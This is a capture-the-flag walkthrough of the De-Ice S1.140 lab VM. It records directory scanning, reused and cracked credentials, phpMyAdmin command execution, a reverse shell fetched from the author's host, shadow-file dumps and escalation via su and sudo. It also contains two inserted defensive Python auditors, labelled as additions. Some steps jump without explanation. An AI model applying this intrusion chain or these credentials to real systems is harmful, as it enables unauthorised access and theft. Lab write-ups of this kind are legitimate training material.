De-IceS1.140

NMAP SCAN

DIRB

---- Scanning URL: http://172.16.28.131:80/ ----
+ http://172.16.28.131:80/cgi-bin/ (CODE:403|SIZE:210)
==> DIRECTORY: http://172.16.28.131:80/forum/
+ http://172.16.28.131:80/index (CODE:200|SIZE:1782)
+ http://172.16.28.131:80/index.html (CODE:200|SIZE:1782)
+ http://172.16.28.131:80/server-status (CODE:403|SIZE:215)

---- Scanning URL: https://172.16.28.131/ ----
+ https://172.16.28.131/cgi-bin/ (CODE:403|SIZE:210)
==> DIRECTORY: https://172.16.28.131/forum/
+ https://172.16.28.131/index (CODE:200|SIZE:1782)
+ https://172.16.28.131/index.html (CODE:200|SIZE:1782)
==> DIRECTORY: https://172.16.28.131/phpmyadmin/
+ https://172.16.28.131/server-status (CODE:403|SIZE:215)
==> DIRECTORY: https://172.16.28.131/webmail/

The Web App

Found Sandy's (SWillard) email address. From the look of this thread she may be an admin for this app. The same thread also shows that email addresses follow the pattern initials@lazyadmins.corp.

Sandy = sw@lazyadmins.corp

Sandy got married and changed her name from Sandy Raines to Sandy Willard.

Found that this app is My Little Forum Version 2.3.1.

Found a section in the forums where someone had posted a copy of the auth.log file. Parsing through it, I found a small section with a connection from 10.0.0.23 that contained a password for mbrown:

Mbrown

!DFiuoTkbxtdk0!


Logged in to the mail server as mbrown (reused credentials). Let's see if there is anything good!

Looks like phpmyadmin creds…

And in his sent items we get confirmation that they are PHPMyAdmin creds:

Root

S4!y.dk)j/_d1pKtX1

We have hashes for the squirrelmail logins…

We have hashes for the forum logins…

Could not easily identify the hashing algorithm for the forum app… So I replaced the admin's hash with the one from Mbrown and logged in.

Admin access!

Started cracking hashes for SquirrelMail:

rh@lazyadmin.corp  20f1275ce5e67be2c06476333b68f585  MD5 : tum-ti-tum
sw@lazyadmin.corp  07255e7701a86ad1672765d15082f1a3  MD5 : Austin-Willard
mb@lazyadmin.corp  d768176c4486ce77787c73883406fe97  MD5 : !DFiuoTkbxtdk0!
mp@lazyadmin.corp  fa514a9f39391658b15d5db542029aa6  [Not found]

Used PHPMyAdmin to create PHP command execution. Found that the templates_c directory was writable, via the forum update page in the admin section.

Used the shell to wget a Python reverse shell from my web server.

Ran the Python shell from the same command and got a shell back.

Uploaded a Meterpreter shell to get a more stable shell.

Dumped /etc/passwd:

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false
dovecot:x:106:115:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:107:65534:Dovecot login user,,,:/nonexistent:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
postfix:x:109:116::/var/spool/postfix:/bin/false
memcache:x:110:118:Memcached,,,:/nonexistent:/bin/false
proftpd:x:111:65534::/var/run/proftpd:/bin/false
ftp:x:112:65534::/home/ftp:/bin/false
vmail:x:150:8:Virtual maildir handler:/var/vmail:/sbin/nologin
mbrown:x:1001:1001:Mark Brown,404,2457,:/home/mbrown:/bin/bash
rhedley:x:1002:1002:Richard Hedley,407,3412,:/home/rhedley:/bin/bash
swillard:x:1003:1003:Sandy Willard,401,1429,:/home/swillard:/bin/bash
mparker:x:1004:1004:Miles Parker,403,6283,:/home/mparker:/bin/bash

Found mbrown, rhedley, swillard, and mparker.

Cannot SSH in because the server only accepts public-key authentication, so I decided to try to su to each user with their forum passwords.

rhedley worked!

Found backup.sh in /opt/.

Found a script that creates /home/ftp/backup***.tar.gz.enc, with the encryption password hardcoded in it!

rhedley@webhost:/opt$ cat backup.sh
cat backup.sh
#!/bin/bash
## Backup Script
## by SRaines
## Lazy Admin Corp
TMPBACKUP="/tmp/backup";
NAME_PREFIX="backup";
NAME_DATE=$(date +%y%m%d);
NAME_HOST=$(/bin/hostname);
FILENAME=${NAME_PREFIX}_${NAME_HOST}_${NAME_DATE}.tar;
[ ! -d ${TMPBACKUP} ] && mkdir -p ${TMPBACKUP}
tar cpf ${TMPBACKUP}/${FILENAME} /etc/fstab /etc/apache2 /etc/hosts /etc/motd /etc/ssh/sshd_config /etc/dovecot /etc/postfix /var/www /home /opt
gzip --best -f ${TMPBACKUP}/${FILENAME}
openssl aes-256-cbc -in ${TMPBACKUP}/${FILENAME}.gz -out ${TMPBACKUP}/${FILENAME}.gz.enc -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
mv ${TMPBACKUP}/${FILENAME}.gz.enc ./
rm -fr ${TMPBACKUP}

So the encryption password is wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
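The root cause here is a passphrase passed inline as "-pass pass:..." in a script that any local user can read. The following Python auditor, added here and not part of the original post or the lab, scans a shell script for inline openssl passphrases and password assignments and flags loose file permissions; the sample script, path and passphrase value it uses are constructed placeholders.

```python
import os
import re
import stat
import tempfile

# Secrets placed inline on a command line, as in the backup script above:
# openssl's "-pass pass:<literal>" form and plain PASSWORD=... assignments.
INLINE_SECRET_PATTERNS = [
    ("openssl -pass pass:", re.compile(r"-pass\s+pass:(?P<s>\S+)")),
    ("password assignment", re.compile(r"""(?i)\b(?:pass(?:word)?|secret)=['"]?(?P<s>[^\s'"]+)""")),
]

def scan_script(path):
    """Return (line_no, kind, masked_preview) findings for one script.
    line_no 0 is used for the file-permission finding."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            for kind, pat in INLINE_SECRET_PATTERNS:
                m = pat.search(line)
                if m:
                    secret = m.group("s")
                    # Mask the value so the audit report is not itself a copy of the secret.
                    findings.append((lineno, kind, secret[:2] + "*" * (len(secret) - 2)))
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        # Any local account (here: whoever can su to rhedley) can read the passphrase.
        findings.append((0, "group/world readable", oct(mode)))
    return findings

# Constructed sample modelled on the lab's backup.sh; the passphrase is a placeholder.
# Fix: keep the passphrase out of the script, e.g. "-pass file:/root/.backup_pass" with
# that file owned by root and mode 0600, and make the script itself mode 0700.
SAMPLE_SCRIPT = """#!/bin/bash
TMPBACKUP="/tmp/backup"
tar cpf ${TMPBACKUP}/backup.tar /etc /home /opt
gzip --best -f ${TMPBACKUP}/backup.tar
openssl aes-256-cbc -in ${TMPBACKUP}/backup.tar.gz -out ${TMPBACKUP}/backup.tar.gz.enc -pass pass:EXAMPLE_PASSPHRASE
"""

def demo():
    """Write the constructed sample with permissive mode bits and scan it."""
    with tempfile.NamedTemporaryFile("w", suffix=".sh", delete=False) as fh:
        fh.write(SAMPLE_SCRIPT)
        path = fh.name
    os.chmod(path, 0o755)
    try:
        return scan_script(path)
    finally:
        os.unlink(path)
```

Run demo() to see the two findings: the inline passphrase on line 5 (masked) and the readable mode bits.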

 

 

rhedley@webhost:/home/ftp/incoming$ chmod 777 test.tar.gz
rhedley@webhost:/home/ftp/incoming$ tar -xf test.tar.gz
tar -xf test.tar.gz
rhedley@webhost:/home/ftp/incoming$ ls
ls
15023.c  backup_webhost_130111.tar.gz.enc  etc  test.tar.gz

----------

rhedley@webhost:/home/ftp/incoming/etc$ chmod 777 shadow
chmod 777 shadow
rhedley@webhost:/home/ftp/incoming/etc$ cat shadow
cat shadow

root:!:15773:0:99999:7:::
daemon:*:15773:0:99999:7:::
bin:*:15773:0:99999:7:::
sys:*:15773:0:99999:7:::
sync:*:15773:0:99999:7:::
games:*:15773:0:99999:7:::
man:*:15773:0:99999:7:::
lp:*:15773:0:99999:7:::
mail:*:15773:0:99999:7:::
news:*:15773:0:99999:7:::
uucp:*:15773:0:99999:7:::
proxy:*:15773:0:99999:7:::
www-data:*:15773:0:99999:7:::
backup:*:15773:0:99999:7:::
list:*:15773:0:99999:7:::
irc:*:15773:0:99999:7:::
gnats:*:15773:0:99999:7:::
nobody:*:15773:0:99999:7:::
libuuid:!:15773:0:99999:7:::
syslog:*:15773:0:99999:7:::
messagebus:*:15773:0:99999:7:::
whoopsie:*:15773:0:99999:7:::
landscape:*:15773:0:99999:7:::
mysql:!:15773:0:99999:7:::
sshd:*:15773:0:99999:7:::
sraines:$6$4S0pqZzV$t91VbUY8ActvkS3717wllrv8ExZO/ZSHDIakHmPCvwzedKt2qDRh7509Zhk45QkKEMYPPwP7PInpp6WAJYwvk1:15773:0:99999:7:::
mbrown:$6$DhcTFbl/$GcvUMLKvsybo4uXaS6Wx08rCdk6dPfYXASXzahAHlgy8A90PfwdoJXXyXZluw95aQeTGrjWF2zYPR0z2bX4p31:15773:0:99999:7:::
rhedley:$6$PpzRSzPO$0MhuP.G1pCB3Wc1zAzFSTSnOnEeuJm5kbXUGmlAwH2Jz1bFJU/.ZPwsheyyt4hrtMvZ/k6wT38hXYZcWY2ELV/:15773:0:99999:7:::

 

Sent hashes into the cracking rig. Results:

Mbrown : Mbrown
sraines : brillantissimo

 

rhedley@webhost:/home/ftp/incoming/etc$ su swillard
su swillard
Password: brillantissimo
swillard@webhost:/home/ftp/incoming/etc$ sudo ls /root
sudo ls /root
[sudo] password for swillard: brillantissimo
cleanlogs.sh  secret.jpg
sudo cp /root/secret.jpg /var/www
swillard@webhost:/home/ftp/incoming/etc$
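Two things made the lateral moves above possible: web-app passwords that were also valid for su/sudo on the host, and a service account (www-data) with a real shell. The following Python audit, added here and not part of the original post or the lab, parses /etc/passwd and /etc/shadow excerpts, classifies each stored password field by its format (the same question the "could not identify the hashing algorithm" remark raises, answered for the 32-hex SquirrelMail style and the $6$ shadow style), and lists the accounts an admin should check for reuse. The excerpts it parses are constructed in the format of the dumps above with placeholder hashes, not the lab's values.

```python
import re

INTERACTIVE_SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/bin/zsh"}

def hash_kind(field):
    """Classify a stored password field by its format alone (no cracking involved)."""
    if field == "":
        return "empty"
    if field[0] in "!*":
        return "locked"
    for prefix, name in (("$6$", "sha512crypt (salted)"), ("$5$", "sha256crypt (salted)"),
                         ("$1$", "md5crypt (salted, legacy)"), ("$2", "bcrypt (salted)")):
        if field.startswith(prefix):
            return name
    if re.fullmatch(r"[0-9a-f]{32}", field):
        return "unsalted MD5 (weak)"  # the shape of the SquirrelMail-style hashes above
    return "unknown"

def audit(passwd_text, shadow_text):
    """Return (user, finding) pairs that a defender would act on."""
    shadow = {l.split(":")[0]: l.split(":")[1] for l in shadow_text.strip().splitlines()}
    findings = []
    for line in passwd_text.strip().splitlines():
        user, _, uid, _, _, _, shell = line.split(":")
        kind = hash_kind(shadow.get(user, ""))
        interactive = shell in INTERACTIVE_SHELLS
        if interactive and int(uid) < 1000 and user != "root":
            # e.g. www-data with /bin/sh: web-app code execution lands in a usable shell
            findings.append((user, "service-account-with-shell"))
        if interactive and kind not in ("locked", "empty"):
            # a su/sudo target: its password must not be shared with the forum or mail app
            findings.append((user, "interactive-with-usable-password"))
        if kind.endswith("(weak)"):
            findings.append((user, "weak-hash-format"))
    return findings

# Constructed excerpts in the format of the dumps above; hashes are placeholders, not the lab's.
PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/sh
mbrown:x:1001:1001:Mark Brown:/home/mbrown:/bin/bash
sraines:x:1005:1005:Sandy Raines:/home/sraines:/bin/bash
"""
SHADOW = """root:!:15773:0:99999:7:::
www-data:*:15773:0:99999:7:::
mbrown:$6$saltsalt$PLACEHOLDERHASHmbrown:15773:0:99999:7:::
sraines:$6$saltsalt$PLACEHOLDERHASHsraines:15773:0:99999:7:::
"""
```

Calling audit(PASSWD, SHADOW) flags www-data for its shell and mbrown and sraines as interactive accounts whose passwords need to be distinct from every web-app password; root is skipped because its shadow entry is locked.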

 
